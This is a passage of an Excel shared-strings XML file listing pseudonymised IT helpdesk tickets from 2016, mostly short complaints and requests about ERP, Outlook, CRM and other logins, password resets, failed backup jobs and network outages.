    <t xml:space="preserve">_x000D_
_x000D_
received from: ohdrnswl.rezuibdt@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
erp is very slow, please resolve the issue on urgent basis._x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t xml:space="preserve">i have lost my access to reporting_tool in crm as per notes below </t>
  </si>
  <si>
    <t xml:space="preserve">from: dthyan matheywtyuews 
sent: thursday, september 29, 2016 6:26 pm
to: nwfodmhc exurcwkm
subject: sabrthy fw: synchronization log: 
importance: high
i have lost my access to reporting_tool in crm as per notes below 
dthyan matheywtyuews
sales manager gl2
oetlgbfw.bsctrnwp@gmail.com
_____________________________________________
from: dthyan matheywtyuews 
sent: thursday, september 29, 2016 8:23 am
to: dthyan matheywtyuews &lt;oetlgbfw.bsctrnwp@gmail.com&gt;
subject: synchronization log: 
importance: high
8:22:28 synchronizer version 16.0.6741
8:22:28 synchronizing mailbox 'dthyan matheywtyuews'
8:22:28 synchronizing hierarchy
8:22:29 synchronizing local changes in folder 'calendar'
8:22:29 uploading to server '
8:22:30     1 view(s)/form(s) updated in online folder
8:22:30 synchronizing local changes in folder 'inbox'
8:22:30 uploading to server '
8:22:31     1 view(s)/form(s) updated in online folder
8:22:31 downloading from server '
8:22:31     1 item(s) changed read-state in offline folder
8:22:31 synchronizing local changes in folder 'contacts'
8:22:31 uploading to server '
8:22:32     1 view(s)/form(s) updated in online folder
8:22:32 synchronizing local changes in folder 'tasks'
8:22:32 uploading to server '
8:22:33     1 view(s)/form(s) updated in online folder
8:22:35 synchronizing server changes in folder 'russ hall - calendar'
8:22:35 downloading from server '
8:22:35 error synchronizing folder
8:22:35           [91181116-508-91181116-560]
8:22:35           you do not have sufficient permission to perform this operation on this object.  see the folder contact or your system administrator.
8:22:35           microsoft exchange information store
8:22:35           for more information on this failure, click the url below:
8:22:35           
8:22:35 done
8:22:59 microsoft exchange offline address book
8:22:59 download successful
</t>
  </si>
  <si>
    <t xml:space="preserve">outlook not starting </t>
  </si>
  <si>
    <t>uncpaqvf dxefiybg</t>
  </si>
  <si>
    <t>frequent account lock out.</t>
  </si>
  <si>
    <t>user : wothyehre is locked out every day.</t>
  </si>
  <si>
    <t>dgwrmsja jzlpwuit</t>
  </si>
  <si>
    <t>unable to login to distributor_tool</t>
  </si>
  <si>
    <t>benoittry is unable to login to distributor_tool. waiting to see if one of the previous passwords (passwords used in erp)  was used while resetting in password_management_tool.</t>
  </si>
  <si>
    <t>need help in changing password in password_management_tool password manager</t>
  </si>
  <si>
    <t>zngpmjue qvyzposw</t>
  </si>
  <si>
    <t xml:space="preserve">need developer display access for user uacyltoe hxgayczecp1 in SID_29 system </t>
  </si>
  <si>
    <t>need developer display access for user uacyltoe hxgayczecp1 in SID_29 system</t>
  </si>
  <si>
    <t>outlook issues</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jmvnxtgc.kvhxntqp@gmail.com_x000D_
_x000D_
encountring outlook issues._x000D_
cannot open from pc_x000D_
urgent._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>jmvnxtgc kvhxntqp</t>
  </si>
  <si>
    <t>issue in engineering tool</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: eakhgxbw.pfyadjmb@gmail.com_x000D_
_x000D_
dear sir,_x000D_
_x000D_
i was trying to upload engineering_tool in system. after loading all the details for price, drill details engineering_tool is saved. below is the screen shot which show all details filled._x000D_
_x000D_
but i am trying to upload this engineering_tool on server faced an error ,for which screen shot is attached. pl look into this pl resolve this immediately._x000D_
_x000D_
all details filled for pricing in uacyltoe hxgaycze sites._x000D_
_x000D_
[cid:image009.jpg@01SID_35b03.7527cc40]_x000D_
_x000D_
screen shot for error._x000D_
_x000D_
_x000D_
[cid:image013.jpg@01SID_35b03.7527cc40]_x000D_
</t>
  </si>
  <si>
    <t>eakhgxbw pfyadjmb</t>
  </si>
  <si>
    <t>reset passwords for fkuqjwit jgcsaqzi using password_management_tool password reset.</t>
  </si>
  <si>
    <t>fkuqjwit jgcsaqzi</t>
  </si>
  <si>
    <t xml:space="preserve">job bkbackup_tool_reporting_tool_prod_inc failed in job_scheduler at: 09/30/2016 00:08:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
9/30/2016 12:02:31 am :: error: channelerror: connectionreset _x000D_
_x000D_
job bkbackup_tool_reporting_tool_prod_inc failed in job_scheduler at: 09/30/2016 00:08:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bkbackup_tool_HostName_771_prod_full failed in job_scheduler at: 09/29/2016 23:56:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkbackup_tool_HostName_771_prod_full failed in job_scheduler at: 09/29/2016 23:56:00</t>
  </si>
  <si>
    <t>erp slow</t>
  </si>
  <si>
    <t>erp system is very slow in apac dc. i asked stefytyn shi to uacyltoe hxgaycze the network. he uacyltoe hxgaycze the network, it about 50% packet loss when ping erp server (81.93.78.714), and he check the data from truview, there only 20% link utilization. and he asked apac plant, erp is slow too. so please check the server and solve the issue.</t>
  </si>
  <si>
    <t>pkdavqwt tafrmxsh</t>
  </si>
  <si>
    <t>erp can't log on</t>
  </si>
  <si>
    <t>erp disconnected and we can't log on now.  _x000D_
before the disconnection, it took several mins to conduct any action in erp.</t>
  </si>
  <si>
    <t>always get reminder for approval of requisition 01447255, even i approved a lot of times</t>
  </si>
  <si>
    <t>i'm kate liu from apac plant, i can't complete some pr approval, need support_x000D_
my email: mhikeucr.quaixnbe@gmail.com</t>
  </si>
  <si>
    <t>mhikeucr quaixnbe</t>
  </si>
  <si>
    <t>top urgent! //price issue</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wktesmbp.lorjymef@gmail.com
dear teamï¼Œ
pls help to maintain the net price of mm#7108755~
we need to create sto for this material from plant_283 to plant_105 &amp; its net price just shows as "0.01"~pls. help to maintain it a.s.a.p. cause it's a urgent case~
thx in advance!
[cid:image001.png@01SID_35b09.55c64b00]
b.rgds
judthtihty.zhuyhts
company hardpoint apac-wgq dc
</t>
  </si>
  <si>
    <t>outlook cannot login for notebook</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: oydlehun.svnfrxdk@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
please help. i cannot login outlook on my notebook._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>docking station not working</t>
  </si>
  <si>
    <t>docking station not working. no power for laptop</t>
  </si>
  <si>
    <t>cann't  do "mb31" for po115890552</t>
  </si>
  <si>
    <t>there is a po 226901663  in plant_282._x000D_
now,we need ship it out,but we can't do "mb31" .please help .</t>
  </si>
  <si>
    <t>jerydwbn gdylnaue</t>
  </si>
  <si>
    <t>india plant - india (): node company-ap-ind-kkc-2960s-access-sw01.company.com &amp; sw02 is down</t>
  </si>
  <si>
    <t xml:space="preserve">india plant - india (): node company-ap-ind-kkc-2960s-access-sw01.company.com   is down
node company-ap-ind-kkc-2960s-access-sw01.company.com located at india kirty is down.
interface down - on   gigabitethernet3/1 &amp;   gigabitethernet3/6Â· connection to company-ap-ind-kkc-2960s-access-sw01 - on   company-ap-ind-admin-4503-core-sw01.company.com </t>
  </si>
  <si>
    <t>urgent- mm6173026</t>
  </si>
  <si>
    <t xml:space="preserve">dear all
would you please solve the issue ?
to settle negative stock, i need to do gr with migo manually.
like below, erp said g/l account 23646112 does not exist in company code 534522.
please let me know how to handle it ?
today is the end of month so please solve it aerp.
</t>
  </si>
  <si>
    <t>customers and sales are not able to create quotes</t>
  </si>
  <si>
    <t>received over 23 emails and numerous calls from customers and sales they are not able to create quotes.  these are the last few days of the quarter and this is a huge risk to lose sales and negatively impact customers.</t>
  </si>
  <si>
    <t>i am not able to service customers - distributor_tool / companycenter login not working</t>
  </si>
  <si>
    <t xml:space="preserve">unauthorised access. your account has been deleted. please contact help desk._x000D_
_x000D_
windows, SID_34, SID_37, SID_39, password_management_tool, bw, hana,  reporting_tool, crm, dynamics, outlook etc.... all are fine. </t>
  </si>
  <si>
    <t>ms office general question</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_555 failed in job_scheduler at: 09/29/2016 18:23:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_555 failed in job_scheduler at: 09/29/2016 18:23:00</t>
  </si>
  <si>
    <t>can you please help tami receive in the rma below.  details of the issue are below this screen shot.  i'm not sure how t</t>
  </si>
  <si>
    <t>can you please help tami receive in the rma below.  details of the issue are below this screen shot.  i'm not sure how to help.</t>
  </si>
  <si>
    <t>request to remove 1 day pick route logic from supply_chain for customer 81174536 in plant_101 view.</t>
  </si>
  <si>
    <t>xnqzhtwu hivumtfz</t>
  </si>
  <si>
    <t xml:space="preserve">crm help needed </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: oetlgbfw.bsctrnwp@gmail.com
i am not getting my reporting_engineering_tools and it says i don't have access to veiw manager reports
please fix aerp
dthyan matheywtyuews
sales manager gl2
oetlgbfw.bsctrnwp@gmail.com&lt;mailto:oetlgbfw.bsctrnwp@gmail.com&gt;
</t>
  </si>
  <si>
    <t>skype goes to not responding mode</t>
  </si>
  <si>
    <t>skype goes to not responding mode 
phone:</t>
  </si>
  <si>
    <t>ms crm login issue.</t>
  </si>
  <si>
    <t xml:space="preserve">ms crm login issue.
-connected to the user system using teamviewer.
-user is on the company network.
-when user tries to login to the ms crm its gives him a error.
</t>
  </si>
  <si>
    <t>ticket update on sev 2 ticket inplant_864860</t>
  </si>
  <si>
    <t xml:space="preserve">usa - company-na-usa-usa-shop-3750g-access-sw02 hard down due to storm last night </t>
  </si>
  <si>
    <t>we had some bad storms come through last night and took out a switch on the machine network.</t>
  </si>
  <si>
    <t>lixjduso upanbtxg</t>
  </si>
  <si>
    <t xml:space="preserve">external link not working in ie </t>
  </si>
  <si>
    <t xml:space="preserve">unable to install mobile app on iphone </t>
  </si>
  <si>
    <t xml:space="preserve">unable to install mobile app on iphone 
phone: </t>
  </si>
  <si>
    <t>engg work bench login issue.</t>
  </si>
  <si>
    <t>vyjmlain hvjbmdgi</t>
  </si>
  <si>
    <t>please remove quote from workflow</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: lwgytuxq.qspdztiw@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
please clear quote 3116211904 from my workflow.  this quote no longer exists and should not be showing up in my workflow.  see attached screen shot._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">windows account lock out issue </t>
  </si>
  <si>
    <t>issues with hana</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zdcheloy.aevzsogn@gmail.com
we are all having issues with hana on our systems.  i am on vacation for 2 weeks, but please work with brandeerthy as the lead for getting this fixed.
we have a defined report that utilized hana to bring in information.  it has been working fine but not we seem to have issues:
1.       when we select analysis the refresh all code is grayed out when we used to be able to just go in and hit refresh all and be done.
2.       i tried inserting the data source for quote performance from where this is built from, but when i do this i get:
a.       when i refresh all, not data changes
b.      when i looked at the display, none of the columns and background filters are appearing any longer.
brandeerthy please utilize the canada file in the quote performance canada folder dated 2016 09 29 rev 1 as the uacyltoe hxgaycze one when it calls you.
</t>
  </si>
  <si>
    <t>distributor_tool issues for sales area 1108</t>
  </si>
  <si>
    <t>please be aware that sales reps and customer are not able ot request a quote through distributor_tool for sales area 1108.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: iqcylpok.ascpqvni@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
printer ts02 in the purchasing dept. is not sending scans to our emails.  can someone look into this please?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>add ed sheehy to purchasing ad</t>
  </si>
  <si>
    <t xml:space="preserve">xszoedmc gmhkdsnw  please add oabdfcnk xeuhkoqa (shyheehew2) to purchasingupstreamsso and active directory.  the samaccountname in ad is to be all lowercase.  </t>
  </si>
  <si>
    <t>swap clients e7350 with e7250</t>
  </si>
  <si>
    <t xml:space="preserve">cannot get into the lean tracker to save lean events. </t>
  </si>
  <si>
    <t xml:space="preserve">lean tracker will give me an error when trying to save a lean event.  i get an infopath error.  </t>
  </si>
  <si>
    <t>xdabnget wryuikgd</t>
  </si>
  <si>
    <t xml:space="preserve">need to usa remote access to carolutyu magyarics to repair prepull system used by the usa factory. </t>
  </si>
  <si>
    <t>need to usa remote access to carolutyu magyarics to repair prepull system which is part of the usanet used by the usa factory. carolutyu is an it consultant used in the past to create custom databases and applications to support the business on the production floor.  her windows id was vvmagyc.   she will require vpn access also along with her administrative rights to repair the sql database.  this system has been down for 36 hours and internal it resources at usa and usa have not been able to resolve.</t>
  </si>
  <si>
    <t>bnzysqhm ghsinpmu</t>
  </si>
  <si>
    <t>for p.o 5019287566 error message</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kaguhxwo.uoyipxqg@gmail.com_x000D_
_x000D_
hi it,_x000D_
please help on this. create dn for po 5019287566. </t>
  </si>
  <si>
    <t>crm installation</t>
  </si>
  <si>
    <t>utfaxivy vwgktxcj</t>
  </si>
  <si>
    <t>power outage query</t>
  </si>
  <si>
    <t>pvlxjizg xzvlwqjc</t>
  </si>
  <si>
    <t>reset passwords for hzmxwdrs tcbjyqps using password_management_tool password reset.</t>
  </si>
  <si>
    <t>hzmxwdrs tcbjyqps</t>
  </si>
  <si>
    <t xml:space="preserve">windows password reset request </t>
  </si>
  <si>
    <t>nkryuvct jqvcxdrt</t>
  </si>
  <si>
    <t>need to check the payslips</t>
  </si>
  <si>
    <t>nxvbtfui hjickwyd</t>
  </si>
  <si>
    <t xml:space="preserve">configure crm on the outlook </t>
  </si>
  <si>
    <t>configure crm on the outlook _x000D_
_x000D_
949 245 8817</t>
  </si>
  <si>
    <t>erp SID_39 account locked // password reset</t>
  </si>
  <si>
    <t>infopath installation</t>
  </si>
  <si>
    <t>name:nmpworvu upgtrvnj
language:
browser:microsoft internet explorer
email:nmpworvu.upgtrvnj@gmail.com
customer number:
telephone:
summary:i have an issue saving a lean project to infopath</t>
  </si>
  <si>
    <t>nmpworvu upgtrvnj</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: pcjtisrv.havyuwds@gmail.com_x000D_
_x000D_
hi manjgtiry_x000D_
_x000D_
i got again skype problem â€“ but not that big as the last time._x000D_
_x000D_
every morning when i start my computer i have to add â€žskype" manually (in the add/ins)._x000D_
_x000D_
could you please fix this issue aerp? i will be on vacations from oct 2 â€“ oct 17._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>pcjtisrv havyuwds</t>
  </si>
  <si>
    <t>the back up tape is not ejecting - i am unable to switch tapes for daily back-ups.</t>
  </si>
  <si>
    <t>have not been able to switch the tapes for this week.</t>
  </si>
  <si>
    <t xml:space="preserve">external user called for help for calendar issue </t>
  </si>
  <si>
    <t>can you please remove my email from this mailing list.</t>
  </si>
  <si>
    <t xml:space="preserve">can you please remove my email from this mailing list.
from: cesgrtar abgrtyreu 
sent: thursday, september 29, 2016 5:12 pm
to: nwfodmhc exurcwkm
subject: ranjhruy re: ergebnis evakuierungsÃ¼bung 2016
hello,
can you please remove my email from this mailing list.
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1387 failed in job_scheduler at: 09/29/2016 10:57:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1387 failed in job_scheduler at: 09/29/2016 10:57:00</t>
  </si>
  <si>
    <t>spam mail notification</t>
  </si>
  <si>
    <t>sygionua szunhced</t>
  </si>
  <si>
    <t>urgent help required - crm mobile app issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vnetbgio.lqxztben@gmail.com_x000D_
_x000D_
we're sorry_x000D_
you can't connect to the server because it doesn't have a trusted ssl certificate. contact your crm administrator for assistance._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>telefon mit der nummer 1038091558 ist defekt. sinterei germany. bitte reparieren.</t>
  </si>
  <si>
    <t>telefon mit der nummer  ist defekt. sinterei germany. bitte reparieren.</t>
  </si>
  <si>
    <t>weekly reboot reminder - backup_tool servers HostName_999, HostName_1048/HostName_1049/HostName_1075</t>
  </si>
  <si>
    <t xml:space="preserve">from: root@HostName_189.hq.company.com [mailto:root@HostName_189.hq.company.com] _x000D_
sent: thursday, september 29, 2016 10:00 am_x000D_
to: datacenter_x000D_
subject: weekly reboot reminder - backup_tool servers_x000D_
_x000D_
 _x000D_
datacenter,_x000D_
   _x000D_
please perform the weekly reboot of the azure backup server clhqsm006, backup_tool management server HostName_999, and the backup_tool proxy servers HostName_1048/HostName_1049/HostName_1075, following completion of the daily backup_tool backup processing.  _x000D_
  _x000D_
- raise the job_scheduler batch fence on HostName_999 to 11._x000D_
- ensure there are no backup jobs running in backup_tool or job_scheduler on HostName_999._x000D_
- logon to the backup_tool management server HostName_999 and perform a restart. _x000D_
- after HostName_999 is available, reboot the proxy servers - can boot travel_toolrently._x000D_
- lower the job_scheduler batch fence on HostName_999 to 9 following all reboots._x000D_
_x000D_
- you can reboot clhqsm006 at anytime.   _x000D_
  _x000D_
also, the dell dr4100 storage server is rebooted following the backup_tool server reboots.  this server will be rebooted by the administrator (tim r) following completion of the backup_tool reboots.  _x000D_
  _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>probleme mit vpn \wxstfouy isjzcotm</t>
  </si>
  <si>
    <t>wxstfouy isjzcotm</t>
  </si>
  <si>
    <t>no crm tab</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ltsqkane.ycgwexdf@gmail.com_x000D_
_x000D_
hello,_x000D_
i have no crm tab in my outlook page._x000D_
i was told i need it to fix this._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>stack guard error</t>
  </si>
  <si>
    <t>lewbzysd gqdaikbv</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: peojqgvm.qayeptuo@gmail.com
my outlook does not have the crm ribbon.
please call 
</t>
  </si>
  <si>
    <t>discount form issue</t>
  </si>
  <si>
    <t xml:space="preserve">from: fnqelwpk ahrskvln _x000D_
sent: thursday, september 29, 2016 6:02 pm_x000D_
to: trxsychl xamcuong; nwfodmhc exurcwkm; maliowbg cltnwazh_x000D_
cc: nmyzehow gnlcripo_x000D_
subject: amar re: ayuda con conseciones _x000D_
_x000D_
_x000D_
team,_x000D_
_x000D_
please help me check marfhtyios collaboration_platform settings. he is getting this errror with the discount tool._x000D_
_x000D_
we already talked to rmegscqu juksmtho and it's not an issue with the tool._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>trxsychl xamcuong</t>
  </si>
  <si>
    <t xml:space="preserve">hatryu bau g called in for an issue where he needed access to fuyidkbv koximpja's email as fuyidkbv koximpja has already left the company on 24th of this month.
hatryu is the manager and he needs fuyidkbv koximpja' mailbox to be delegated to him for some important purpose of emails related to customers. please do the needful at the earliest.
contact no - </t>
  </si>
  <si>
    <t>vrjwyqtf qoxkapfw</t>
  </si>
  <si>
    <t>computer volume</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fpbmtxei.jtqbcnfs@gmail.com_x000D_
_x000D_
i am not getting any volume on my computer. please help fix. i need volume for skype._x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>audio is not working</t>
  </si>
  <si>
    <t>chrthryui stavenheim : unbale to login to tess via citrix, user name is ccftv15</t>
  </si>
  <si>
    <t xml:space="preserve">from: oinqckds qieswrfu 
sent: thursday, september 29, 2016 5:30 pm
to: nwfodmhc exurcwkm
cc: chrthryui stavenheim
subject: trurthyuft aw: tess account
hello, can someone check whether chrthryui stavenheim can login with his account ccftv15 
via the citrix access 
with this access.
please inform him and myself when the issue is fixed as we have to generate turnover and satisfy customers
oinqckds qieswrfu
manager tess holemaking design automation
oinqckds.qieswrfu@gmail.com
von: chrthryui stavenheim [mailto:chrthryui.stavenheim@bank.se] 
gesendet: donnerstag, 29. september 2016 08:12
an: oinqckds qieswrfu
betreff: tess account
hello robhyertyj
i've been unable to login to tess a few weeks now. either password och user name is wrong. user name is ccftv15
could you please help me out? 
med vÃ¤nlig hÃ¤lsning / best </t>
  </si>
  <si>
    <t>brxaqlwn auzroqes:332415 / 2016 purchasing check status and reports not seen</t>
  </si>
  <si>
    <t>hello team can you please create a credentials for erp (SID_34) and maintain the same in the safe area.
you can copy same access like - kantthyhn</t>
  </si>
  <si>
    <t>rujteoza mcoswhju</t>
  </si>
  <si>
    <t>engineering_tool error: machining cloud stopped working</t>
  </si>
  <si>
    <t>general issue</t>
  </si>
  <si>
    <t>crm app greyed out</t>
  </si>
  <si>
    <t>iwqjyzph nhmjyzrw</t>
  </si>
  <si>
    <t>uninstallation of adwares from computer</t>
  </si>
  <si>
    <t>blank call // loud noise //gso</t>
  </si>
  <si>
    <t>problem with company center quick quote</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vkzwafuh.tcjnuswg@gmail.com
hi,
i'm trying to enter a quote for a distributor in company center. i filled out the information and clicked quick quote. it did nothing. please advise.
[cid:image001.jpg@01SID_35a25.558fdf50]
vkzwafuh tcjnuswg - cmp
sr. application eng.
vkzwafuh.tcjnuswg@gmail.com
</t>
  </si>
  <si>
    <t>company center-password changes</t>
  </si>
  <si>
    <t>i have been setting users up in company center and have run into an problem.  the passwords i set them up with don't work and i need to reset them.  please get back to me as soon as possible because we need to get users up and running in the system</t>
  </si>
  <si>
    <t xml:space="preserve">there are now over 130 confirmations needing to be deleted since this error was identifies in may. issue was identified to EU_tool support which no longer exists._x000D_
_x000D_
i will forward screen capture images to assigned it agent to better explain this error._x000D_
_x000D_
alrthyu_x000D_
</t>
  </si>
  <si>
    <t>network issues</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: verena.financial@company.com_x000D_
_x000D_
hello,_x000D_
_x000D_
at pc eagw8111482sf i have irrecular network issues. sometimes there is no connection to the network possible, after a restart it works again in most cases._x000D_
the hardware i can reach i checked for disconnection or lax connection._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>lntbvwgk doqhisxf</t>
  </si>
  <si>
    <t>account lock out issue since last two days.</t>
  </si>
  <si>
    <t xml:space="preserve">account lock out issue since last two days._x000D_
</t>
  </si>
  <si>
    <t>mqjdyizg amhywoqg - issues with purchasing access.</t>
  </si>
  <si>
    <t xml:space="preserve">please escalate this issue since mqjdyizg amhywoqg is required to approve sales contracts in purchasing.  mqjdyizg amhywoqg is having an issue with accessing purchasing.  please review bill's ad and samacocuntname  in ad.  then contact bihrtyull thadhylman to resolve.  </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1132 failed in job_scheduler at: 09/29/2016 08:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1132 failed in job_scheduler at: 09/29/2016 08:00:00</t>
  </si>
  <si>
    <t>delivery creation issue</t>
  </si>
  <si>
    <t>purchase order number 5019291164, delivery creation issue.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1137 failed in job_scheduler at: 09/29/2016 07:55:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1137 failed in job_scheduler at: 09/29/2016 07:55:00</t>
  </si>
  <si>
    <t>xszoedmc gmhkdsnw or skype.  contract library access to janhetgdyu fox-chatgrylouy</t>
  </si>
  <si>
    <t xml:space="preserve">xszoedmc gmhkdsnw 7 or skype.  access to collaboration_platform&gt;legal&gt;elengineering toolonic contract management system&gt;libarary&gt;contract archive - industrial folder to janhetgdyu fox-chatgrylouy.  please skype janhetgdyu to work with her. </t>
  </si>
  <si>
    <t xml:space="preserve">lean tracker - not able to add  new event  </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fdmobjul.oicarvqt@gmail.com_x000D_
_x000D_
need  you help_x000D_
_x000D_
_x000D_
_x000D_
[cid:image001.jpg@01SID_35a72.de748da0]_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>sojwqapz okihatrb</t>
  </si>
  <si>
    <t>spl gl r indicator is missing in customer open items feed.</t>
  </si>
  <si>
    <t>spl gl indicator "r - bill of exchange payt request" is missing in customer open items feed.</t>
  </si>
  <si>
    <t>tnywkdpl gnjmazuo</t>
  </si>
  <si>
    <t>ordnerfreigabe fÃ¼r m: kvp3</t>
  </si>
  <si>
    <t>hsh</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: aksthyuhath.shettythruy@company.com
hi,
mr. hatryupsfshytd is  unable to login ess portal. please reset  the password.
emp no
name
userid
manager
20070679
aqihfoly xsrkthvf
hsh
panghyiraj shthuihog
fyi.
[cid:image001.png@01SID_35a6c.bb3839a0]
with </t>
  </si>
  <si>
    <t>badnzyue nxuqmdwl</t>
  </si>
  <si>
    <t>aidw700011 needs to format and reinstall.</t>
  </si>
  <si>
    <t>reinstall EU_tool und hardcopy.\acqpinyd ecygimqd</t>
  </si>
  <si>
    <t>acqpinyd ecygimqd</t>
  </si>
  <si>
    <t>probleme mit companyguest \bctypmjw cbhnxafz</t>
  </si>
  <si>
    <t>probleme mit hp drucker local .\petljhxi bocxgins</t>
  </si>
  <si>
    <t>ich benÃ¶tige hilfe bei der passwortÃ¤nderung / und bei skype - mikrophone zuschaltung!</t>
  </si>
  <si>
    <t xml:space="preserve">ich benÃ¶tige hilfe bei der passwortÃ¤nderung / und bei skype - mikrophone zuschaltung!_x000D_
da ich bei skype meetings zwar andere hÃ¶ren kann diese mich aber nicht hÃ¶ren kÃ¶nnen. </t>
  </si>
  <si>
    <t>ughzilfm cfibdamq wanted details to check for company guest</t>
  </si>
  <si>
    <t>automatically generated confirmations from bls aren't transfered to EU_tool</t>
  </si>
  <si>
    <t xml:space="preserve">system affected: bls (beschichtungsleitstand, engl: coating production system)_x000D_
_x000D_
confirmation for process step packing fhurakgsl mldufqov is not transfered to EU_tool. _x000D_
_x000D_
sample orders: 226901542, 226907395_x000D_
</t>
  </si>
  <si>
    <t>xsjqhdgp ymstzudl</t>
  </si>
  <si>
    <t>i can not create a delivery order number 5019289193nd; error message apo server not o.k</t>
  </si>
  <si>
    <t xml:space="preserve">mm 4983099 _x000D_
bestellnumer 5019289193_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 09/29/2016 04:17:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
_x000D_
[critical] from: bda-net@lhqsm435.company.company.com "lhqsm435.company.company.com [/g]"  time: 9/29/2016 3:16:25 am_x000D_
 ipc failure reading net message (ipc write error_x000D_
 system error: [10053] software caused connection abort_x000D_
) =&gt; aborting._x000D_
_x000D_
backup statistics:_x000D_
          _x000D_
  session queuing time (hours)         0.00        _x000D_
  -------------------------------------------      _x000D_
  completed disk agents ........         37          _x000D_
  failed disk agents ...........          1          _x000D_
  aborted disk agents ..........          0          _x000D_
  -------------------------------------------      _x000D_
  disk agents total  ...........         38          _x000D_
  ===========================================      _x000D_
  completed media agents .......          1          _x000D_
  failed media agents ..........          0          _x000D_
  aborted media agents .........          0          _x000D_
  -------------------------------------------      _x000D_
  media agents total  ..........          1          _x000D_
  ===========================================      _x000D_
  mbytes total .................  534700 mb        _x000D_
  used media total .............          1          _x000D_
  disk agent errors total ......          2    _x000D_
_x000D_
job Job_593 failed in job_scheduler at: 09/29/2016 04:17:00</t>
  </si>
  <si>
    <t>engineering tool malfunction</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jkpwisnf.lgpdyncm@gmail.com_x000D_
_x000D_
dear sir_x000D_
yesterday, i upgraded engineering tool application and now i am facing below problem._x000D_
search and new option is  not appearing in customer find/add tab. kindly help to resolve the issue._x000D_
_x000D_
[cid:image001.jpg@01SID_35a56.d1291481]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>jkpwisnf lgpdyncm</t>
  </si>
  <si>
    <t>purchasing catalogue de-wollschlÃ¤ger needs immediatly to be deleted</t>
  </si>
  <si>
    <t>the company is bankruped</t>
  </si>
  <si>
    <t>telephony_software problem</t>
  </si>
  <si>
    <t>there are connection problems, while calling the sr. the sr gets a silent line while i get connected with the warehouse_toolmail immediately.</t>
  </si>
  <si>
    <t>xjazwpmd sjirdnam</t>
  </si>
  <si>
    <t>EU_tool - can not get the transfer times of our employees since today</t>
  </si>
  <si>
    <t>please see the attached email</t>
  </si>
  <si>
    <t>xnlapdeq wupaeqlv</t>
  </si>
  <si>
    <t>vuxdrbng owqplduj : s1- k1</t>
  </si>
  <si>
    <t>cwryvksu cedsairg</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2645 failed in job_scheduler at: 09/29/2016 03:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2645 failed in job_scheduler at: 09/29/2016 03:30:00</t>
  </si>
  <si>
    <t>selecting customer</t>
  </si>
  <si>
    <t>i cannot select the customer and cannot edit it, see the picture below. there is no button for "new" or "find" which we had in the previous versions and the "select" button is not active</t>
  </si>
  <si>
    <t>nzpfadir swzpfnlj</t>
  </si>
  <si>
    <t>setup new ws \vuxdrbng owqplduj</t>
  </si>
  <si>
    <t>vuxdrbng owqplduj</t>
  </si>
  <si>
    <t>HostName_66:volume: f:\ label:dat1-HostName_66 9a625d75 on server: is over 85% space consumed. space available: 648 k</t>
  </si>
  <si>
    <t>volume: f:\ label:dat1-HostName_66 9a625d75 on server: is over 85% space consumed. space available: 648 k</t>
  </si>
  <si>
    <t>reset the password for bzwrchnd ysfiwvmo on windows ç™»é™†</t>
  </si>
  <si>
    <t>bzwrchnd ysfiwvmo</t>
  </si>
